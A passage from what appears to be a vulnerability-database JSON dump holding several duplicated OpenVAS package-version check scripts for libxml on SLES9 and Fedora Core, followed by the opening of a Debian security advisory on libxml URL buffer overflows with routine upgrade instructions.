07:03:33Z cfischer $\n# Description: Security update for libxml\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libxml\n libxml-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016394 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65564\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0989\", \"CVE-2004-0110\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for libxml\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libxml\", rpm:\"libxml~1.8.17~366.4\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110", "CVE-2004-0989"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libxml\n libxml-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016394 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65564", "href": "http://plugins.openvas.org/nasl.php?oid=65564", "type": "openvas", "title": "SLES9: Security update for libxml", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5016394.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for libxml\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libxml\n libxml-devel\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5016394 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65564);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0989\", \"CVE-2004-0110\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for libxml\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libxml\", rpm:\"libxml~1.8.17~366.4\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2414", "CVE-2004-0110", "CVE-2009-2416", "CVE-2004-0989"], "description": "The remote host is missing an update to libxml\nannounced via advisory FEDORA-2009-8594.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64702", "href": "http://plugins.openvas.org/nasl.php?oid=64702", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8594 (libxml)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8594.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8594 (libxml)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This library allows old Gnome-1 applications to manipulate XML files.\n\nUpdate Information:\n\nThis update includes patches from RHEL-3 addressing a number of security\nvulnerabilities:\n- CVE-2004-0110 (arbitrary code execution via a long URL)\n- CVE-2004-0989 (arbitrary code execution via a long URL)\n- CVE-2009-2414 (stack consumption DoS vulnerabilities)\n- CVE-2009-2416 (use-after-free DoS vulnerabilities)\n\nChangeLog:\n\n* Wed Aug 12 2009 Paul Howarth 1:1.8.17-24\n- renumber existing patches to free up low-numbered patches for EL-3 patches\n- add patch for CAN-2004-0110 and CAN-2004-0989 (#139090)\n- add patch for CVE-2009-2414 and CVE-2009-2416 (#515195, #515205)\n* Sat Jul 25 2009 Fedora Release Engineering 1:1.8.17-23\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Mon Apr 20 2009 Paul Howarth 1:1.8.17-22\n- rebuild for %{_isa} provides/requires\n* Wed Feb 25 2009 Fedora Release Engineering 1:1.8.17-21\n- rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update libxml' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8594\";\ntag_summary = \"The remote host is missing an update to libxml\nannounced via advisory FEDORA-2009-8594.\";\n\n\n\nif(description)\n{\n script_id(64702);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2004-0110\", \"CVE-2004-0989\", \"CVE-2009-2414\", \"CVE-2009-2416\", \"CVE-2004-0110\", \"CVE-2004-0989\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8594 (libxml)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=430644\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=430645\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515195\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515205\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libxml\", rpm:\"libxml~1.8.17~24.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml-devel\", rpm:\"libxml-devel~1.8.17~24.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml-debuginfo\", rpm:\"libxml-debuginfo~1.8.17~24.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2414", "CVE-2004-0110", "CVE-2009-2416", "CVE-2004-0989"], "description": "The remote host is missing an update to libxml\nannounced via advisory FEDORA-2009-8582.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064701", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064701", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8582 (libxml)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8582.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8582 (libxml)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This library allows old Gnome-1 applications to manipulate XML files.\n\nUpdate Information:\n\nThis update includes patches from RHEL-3 addressing a number of security\nvulnerabilities:\n\n- CVE-2004-0110 (arbitrary code execution via a long URL)\n- CVE-2004-0989 (arbitrary code execution via a long URL)\n- CVE-2009-2414 (stack consumption DoS vulnerabilities)\n- CVE-2009-2416 (use-after-free DoS vulnerabilities)\n\nChangeLog:\n\n* Wed Aug 12 2009 Paul Howarth 1:1.8.17-24\n- renumber existing patches to free up low-numbered patches for EL-3 patches\n- add patch for CAN-2004-0110 and CAN-2004-0989 (#139090)\n- add patch for CVE-2009-2414 and CVE-2009-2416 (#515195, #515205)\n* Sat Jul 25 2009 Fedora Release Engineering 1:1.8.17-23\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Mon Apr 20 2009 Paul Howarth 1:1.8.17-22\n- rebuild for %{_isa} provides/requires\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update libxml' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8582\";\ntag_summary = \"The remote host is missing an update to libxml\nannounced via advisory FEDORA-2009-8582.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64701\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2004-0110\", \"CVE-2004-0989\", \"CVE-2009-2414\", \"CVE-2009-2416\", \"CVE-2004-0110\", \"CVE-2004-0989\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8582 (libxml)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=430644\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=430645\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515195\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515205\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libxml\", rpm:\"libxml~1.8.17~24.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml-devel\", rpm:\"libxml-devel~1.8.17~24.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml-debuginfo\", rpm:\"libxml-debuginfo~1.8.17~24.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2414", "CVE-2004-0110", "CVE-2009-2416", "CVE-2004-0989"], "description": "The remote host is missing an update to libxml\nannounced via advisory FEDORA-2009-8582.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64701", "href": "http://plugins.openvas.org/nasl.php?oid=64701", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8582 (libxml)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8582.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8582 (libxml)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This library allows old Gnome-1 applications to manipulate XML files.\n\nUpdate Information:\n\nThis update includes patches from RHEL-3 addressing a number of security\nvulnerabilities:\n\n- CVE-2004-0110 (arbitrary code execution via a long URL)\n- CVE-2004-0989 (arbitrary code execution via a long URL)\n- CVE-2009-2414 (stack consumption DoS vulnerabilities)\n- CVE-2009-2416 (use-after-free DoS vulnerabilities)\n\nChangeLog:\n\n* Wed Aug 12 2009 Paul Howarth 1:1.8.17-24\n- renumber existing patches to free up low-numbered patches for EL-3 patches\n- add patch for CAN-2004-0110 and CAN-2004-0989 (#139090)\n- add patch for CVE-2009-2414 and CVE-2009-2416 (#515195, #515205)\n* Sat Jul 25 2009 Fedora Release Engineering 1:1.8.17-23\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Mon Apr 20 2009 Paul Howarth 1:1.8.17-22\n- rebuild for %{_isa} provides/requires\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update libxml' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8582\";\ntag_summary = \"The remote host is missing an update to libxml\nannounced via advisory FEDORA-2009-8582.\";\n\n\n\nif(description)\n{\n script_id(64701);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2004-0110\", \"CVE-2004-0989\", \"CVE-2009-2414\", \"CVE-2009-2416\", \"CVE-2004-0110\", \"CVE-2004-0989\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8582 (libxml)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=430644\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=430645\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515195\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515205\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libxml\", rpm:\"libxml~1.8.17~24.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml-devel\", rpm:\"libxml-devel~1.8.17~24.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml-debuginfo\", rpm:\"libxml-debuginfo~1.8.17~24.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2414", "CVE-2004-0110", "CVE-2009-2416", "CVE-2004-0989"], "description": "The remote host is missing an update to libxml\nannounced via advisory FEDORA-2009-8594.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064702", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064702", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8594 (libxml)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8594.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8594 (libxml)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This library allows old Gnome-1 applications to manipulate XML files.\n\nUpdate Information:\n\nThis update includes patches from RHEL-3 addressing a number of security\nvulnerabilities:\n- CVE-2004-0110 (arbitrary code execution via a long URL)\n- CVE-2004-0989 (arbitrary code execution via a long URL)\n- CVE-2009-2414 (stack consumption DoS vulnerabilities)\n- CVE-2009-2416 (use-after-free DoS vulnerabilities)\n\nChangeLog:\n\n* Wed Aug 12 2009 Paul Howarth 1:1.8.17-24\n- renumber existing patches to free up low-numbered patches for EL-3 patches\n- add patch for CAN-2004-0110 and CAN-2004-0989 (#139090)\n- add patch for CVE-2009-2414 and CVE-2009-2416 (#515195, #515205)\n* Sat Jul 25 2009 Fedora Release Engineering 1:1.8.17-23\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Mon Apr 20 2009 Paul Howarth 1:1.8.17-22\n- rebuild for %{_isa} provides/requires\n* Wed Feb 25 2009 Fedora Release Engineering 1:1.8.17-21\n- rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update libxml' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8594\";\ntag_summary = \"The remote host is missing an update to libxml\nannounced via advisory FEDORA-2009-8594.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64702\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2004-0110\", \"CVE-2004-0989\", \"CVE-2009-2414\", \"CVE-2009-2416\", \"CVE-2004-0110\", \"CVE-2004-0989\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8594 (libxml)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=430644\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=430645\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515195\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515205\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libxml\", rpm:\"libxml~1.8.17~24.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml-devel\", rpm:\"libxml-devel~1.8.17~24.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml-debuginfo\", rpm:\"libxml-debuginfo~1.8.17~24.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:21:54", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0110"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 455-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 3rd, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : libxml, libxml2\nVulnerability : buffer overflows\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2004-0110\n\nlibxml2 is a library for manipulating XML files.\n\nYuuichi Teranishi discovered a flaw in libxml, the GNOME XML library.\nWhen fetching a remote resource via FTP or HTTP, the library uses\nspecial parsing routines which can overflow a buffer if passed a very\nlong URL. If an attacker is able to find an application using libxml1\nor libxml2 that parses remote resources and allows the attacker to\ncraft the URL, then this flaw could be used to execute arbitrary code.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.8.17-2woody1 of libxml and version 2.4.19-4woody1 of libxml2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.8.17-5 of libxml and version 2.6.6-1 of libxml2.\n\nWe recommend that you upgrade your libxml1 and libxml2 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper 